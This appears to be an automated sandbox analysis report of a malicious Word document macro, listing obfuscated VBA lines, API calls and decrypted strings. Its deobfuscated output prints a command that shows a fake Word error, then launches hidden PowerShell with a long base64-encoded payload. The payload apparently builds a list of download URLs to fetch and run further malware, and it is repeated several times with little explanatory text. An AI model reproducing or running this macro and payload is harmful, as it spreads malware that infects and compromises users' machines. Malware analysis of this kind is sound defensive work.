ahAnAsg yw ahC4Asg yw ahUwBsg yw ahFAHsg yw ahIAVsg yw ahgBpsg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahGUAsg yw ahUABsg yw ahPAGsg yw ahkAbsg yw ahgBUsg yw ahAG0sg yw ahAQQsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahHAGsg yw ahUAUsg yw ahgAnsg yw ahACwsg yw ahAJwsg yw ahBDAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahMAJsg yw ahwApsg yw ahACAsg yw ahAIAsg yw ahApAsg yw ahDsAsg yw ahJABsg yw ahYAGsg yw ahoAYsg yw ahgA2sg yw ahAHUsg yw ahAdQsg yw ahA5Asg yw ahD0Asg yw ahJABsg yw ahTAFsg yw ah8ANsg yw ahwBXsg yw ahACAsg yw ahAKwsg yw ahAgAsg yw ahFsAsg yw ahYwBsg yw ahoAGsg yw ahEAcsg yw ahgBdsg yw ahACgsg yw ahANgsg yw ahA0Asg yw ahCkAsg yw ahIAAsg yw ahrACsg yw ahAAJsg yw ahABDsg yw ahADksg yw ahANgsg yw ahBaAsg yw ahDsAsg yw ahJABsg yw ahBADsg yw ahIAOsg yw ahQBZsg yw ahAD0sg yw ahAKAsg yw ahAoAsg yw ahCcAsg yw ahVAAsg yw ahnACsg yw ahsAJsg yw ahwA2sg yw ahADUsg yw ahAJwsg yw ahApAsg yw ahCsAsg yw ahJwBsg yw ahRACsg yw ahcAKsg yw ahQA7sg yw ahACAsg yw ahAIAsg yw ahAkAsg yw ahHAAsg yw ahZwBsg yw ahCADsg yw ahoAOsg yw ahgAisg yw ahAGMsg yw ahAcgsg yw ahBgAsg yw ahEUAsg yw ahYQBsg yw) -> 21932

                                                                      executed
                                                                      142

                                                                      W71k24g1fo31hq05ui.Create KK, Twt08i5xpa9fd0, L1e1dxo2wbinf3l6

                                                                      SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwB,,) -> 0

                                                                      Twt08i5xpa9fd0

                                                                      L1e1dxo2wbinf3l6

                                                                      executed
                                                                      143

                                                                      Goto wZFCUdE

                                                                      144

                                                                      Dim clyZlt as Paragraph

                                                                      145

                                                                      Set JJqbCtEH = rlKgn

                                                                      rlKgn

                                                                      146

                                                                      For Each clyZlt in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      147

                                                                      Set DdtFCGIA = igIuH

                                                                      igIuH

                                                                      148

                                                                      If Left(clyZlt.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      149

                                                                      wZFCUdE = clyZlt.Range.ListFormat.ListString

                                                                      Range

                                                                      150

                                                                      Elseif InStr(clyZlt.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      151

                                                                      dPYykYG = clyZlt.Range.Text

                                                                      Range

                                                                      152

                                                                      dPYykYG = Replace(saw, "sjgwb", "hqkwjbjdasd" & wZFCUdE)

                                                                      Replace

                                                                      saw

                                                                      153

                                                                      clyZlt.Range.Text = dPYykYG

                                                                      Range

                                                                      154

                                                                      Set clyZlt.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      155

                                                                      Endif

                                                                      156

                                                                      Set OnCoGHI = QgrUG

                                                                      QgrUG

                                                                      157

                                                                      Next clyZlt

                                                                      Paragraphs

                                                                      157

                                                                      wZFCUdE:

                                                                      159

                                                                      End Function

                                                                      Function Hbs0geilvqul, APIs: 98, Strings: 91, Number of lines: 99, Relevance: 336.099
                                                                      APIsMeta Information

                                                                      ZBXzADzi

                                                                      Paragraphs

                                                                      ZAXDGY

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      EBTVGH

                                                                      ilrmFI

                                                                      Paragraphs

                                                                      zhliJ

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      DvhBN

                                                                      wHzvQRHCw

                                                                      Paragraphs

                                                                      OtoVEFFI

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      tfnHGB

                                                                      Replace

                                                                      		Replace("wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ahsg yw ahsg yw ahssg yw ahsg yw ahsg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ahsg yw ahpsg yw ahsg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah","sg yw ah",) -> winmgmts:win32_process Replace("sg yw ahsg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ah/sg yw ahcsg yw ah sg yw ahmsg yw ah^sg yw ahssg yw ah^sg yw ahgsg yw ah sg yw ah%sg yw ahusg yw ahssg yw ahesg yw ahrsg yw ahnsg yw ahasg yw ahmsg yw ahesg yw ah%sg yw ah sg yw ah/sg yw ahvsg yw ah sg yw ahWsg yw ahosg yw ah^sg yw ahrsg yw ahdsg yw ah sg yw ahesg yw ahxsg yw ahpsg yw ah^sg yw ahesg yw ahrsg yw ahisg yw ahesg yw ahnsg yw ah^sg yw ahcsg yw ahesg yw ahdsg yw ah sg yw ahasg yw ahnsg yw ah sg yw ahesg yw ahrsg yw ah^sg yw ahrsg yw ahosg yw ahrsg yw ah sg yw ahtsg yw ahrsg yw ahysg yw ahisg yw ah^sg yw ahnsg yw ahgsg yw ah sg yw ahtsg yw ahosg yw ah sg yw ahosg yw ahpsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ahtsg yw ahhsg yw ah^sg yw ahesg yw ah sg yw ahfsg yw ahisg yw ah^sg yw ahlsg yw ahesg yw ah.sg yw ah sg yw ah&sg yw ah sg yw ahpsg yw ah^sg yw ahosg yw ahwsg yw ahesg yw ah^sg yw ahrsg yw ahssg yw ah^sg yw ahhsg yw ahesg yw ah^sg yw ahlsg yw ahlsg yw ah^sg yw ah sg yw ah-sg yw ahwsg yw ah sg yw ahhsg yw ahisg yw ah^sg yw ahdsg yw ahdsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ah-sg yw ah^sg yw ahesg yw ah^sg yw ahnsg yw ahcsg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah IAAsg yw ahgAFsg yw ahMARsg yw ahQBUsg yw ahAC0sg yw ahAaQsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahgACsg yw ahAAdsg yw ahgBhsg yw ahAHIsg yw ahASQsg yw ahBhAsg yw ahEIAsg yw ahTABsg yw ahFADsg yw ahoAUsg yw ahABHsg yw ahAEIsg yw ahAIAsg yw ahAgAsg yw ahCgAsg yw ahIABsg yw ahbAFsg yw ahQAWsg yw ahQBQsg yw ahAGUsg yw ahAXQsg yw ahAoAsg yw ahCIAsg yw ahewAsg yw ahyAHsg yw ah0Aesg yw ahwA0sg yw ahAH0sg yw ahAewsg yw ahA1Asg yw ahH0Asg yw ahewAsg yw ahxAHsg yw ah0Aesg yw ahwAwsg yw ahAH0sg yw ahAewsg yw ahAzAsg yw ahH0Asg yw ahIgAsg yw ahgACsg yw ah0AZsg yw ahgAnsg yw ahAC4sg yw ahARAsg yw ahBpAsg yw ahHIAsg yw ahJwAsg yw ahsACsg yw ahcAbsg yw ahQAusg yw ahAEksg yw ahATwsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahTAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahARQsg yw ahBDAsg yw ahFQAsg yw ahbwBsg yw ahSAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahAUwsg yw ahB0Asg yw ahCcAsg yw ahLAAsg yw ahnAEsg yw ahUAJsg yw ahwApsg yw ahACksg yw ahAOwsg yw ahAgAsg yw ahHMAsg yw ahRQBsg yw ahUACsg yw ahAAKsg yw ahAAnsg yw ahADIsg yw ahAOQsg yw ahB4Asg yw ahCcAsg yw ahKwAsg yw ahnAGsg yw ahQAJsg yw ahwArsg yw ahACcsg yw ahANAsg yw ahBNAsg yw ahCcAsg yw ahKQAsg yw ahgACsg yw ahAAKsg yw ahAAgsg yw ahAFssg yw ahAVAsg yw ahBZAsg yw ahHAAsg yw ahRQBsg yw ahdACsg yw ahgAIsg yw ahgB7sg yw ahADcsg yw ahAfQsg yw ahB7Asg yw ahDEAsg yw ahfQBsg yw ah7ADsg yw ahIAfsg yw ahQB7sg yw ahADMsg yw ahAfQsg yw ahB7Asg yw ahDYAsg yw ahfQBsg yw ah7ADsg yw ahQAfsg yw ahQB7sg yw ahADAsg yw ahAfQsg yw ahB7Asg yw ahDUAsg yw ahfQAsg yw ahiACsg yw ahAALsg yw ahQBmsg yw ahACcsg yw ahATgsg yw ahBhAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahkAcsg yw ahwAnsg yw ahACwsg yw ahAJwsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahuAEsg yw ah4ARsg yw ahQB0sg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahC4Asg yw ahUwBsg yw ahFAHsg yw ahIAVsg yw ahgBpsg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahGUAsg yw ahUABsg yw ahPAGsg yw ahkAbsg yw ahgBUsg yw ahAG0sg yw ahAQQsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahHAGsg yw ahUAUsg yw ahgAnsg yw ahACwsg yw ahAJwsg yw ahBDAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahMAJsg yw ahwApsg yw ahACAsg yw ahAIAsg yw ahApAsg yw ahDsAsg yw ahJABsg yw ahYAGsg yw ahoAYsg yw ahgA2sg yw ahAHUsg yw ahAdQsg yw ahA5Asg yw ahD0Asg yw ahJABsg yw ahTAFsg yw ah8ANsg yw ahwBXsg yw ahACAsg yw ahAKwsg yw ahAgAsg yw ahFsAsg yw ahYwBsg yw ahoAGsg yw ahEAcsg yw ahgBdsg yw ahACgsg yw ahANgsg yw ahA0Asg yw ahCkAsg yw ahIAAsg yw ahrACsg yw ahAAJsg yw ahABDsg yw ahADksg yw ahANgsg yw ahBaAsg yw ahDsAsg yw ahJABsg yw ahBADsg yw ahIAOsg yw ahQBZsg yw ahAD0sg yw ahAKAsg yw ahAoAsg yw ahCcAsg yw ahVAAsg yw ahnACsg yw ahsAJsg yw ahwA2sg yw ahADUsg yw ahAJwsg yw ahApAsg yw ahCsAsg yw ahJwBsg yw ahRACsg yw ahcAKsg yw ahQA7sg yw ahACAsg yw ahAIAsg yw ahAkAsg yw ahHAAsg yw ahZwBsg yw ahCADsg yw ahoAOsg yw ahgAisg yw ahAGMsg yw ahAcgsg yw ahBgAsg yw ahEUAsg yw ahYQBsg yw ah,"sg yw ah",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBh

                                                                      Zn5_1mdwh2kp2

                                                                      aNLHyKGxD

                                                                      Paragraphs

                                                                      VrzOGkkDJ

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      ykoqBxAG

                                                                      BjqtUGzGV

                                                                      Paragraphs

                                                                      LEeUqk

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      wuVfVIU

                                                                      ifZhJxP

                                                                      Paragraphs

                                                                      rQGxCbRtR

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      NirTjIE

                                                                      StringsDecrypted Strings
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "sg yw ah"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      LineInstructionMeta Information
                                                                      230

                                                                      Function Hbs0geilvqul(Cxe014lg73v5)

                                                                      231

                                                                      Goto dUBsAD

                                                                      executed
                                                                      232

                                                                      Dim TpAnAB as Paragraph

                                                                      233

                                                                      Set IEHycIT = ZBXzADzi

                                                                      ZBXzADzi

                                                                      234

                                                                      For Each TpAnAB in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      235

                                                                      Set BRoZbEF = ZAXDGY

                                                                      ZAXDGY

                                                                      236

                                                                      If Left(TpAnAB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      237

                                                                      dUBsAD = TpAnAB.Range.ListFormat.ListString

                                                                      Range

                                                                      238

                                                                      Elseif InStr(TpAnAB.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      239

                                                                      FTbqcNF = TpAnAB.Range.Text

                                                                      Range

                                                                      240

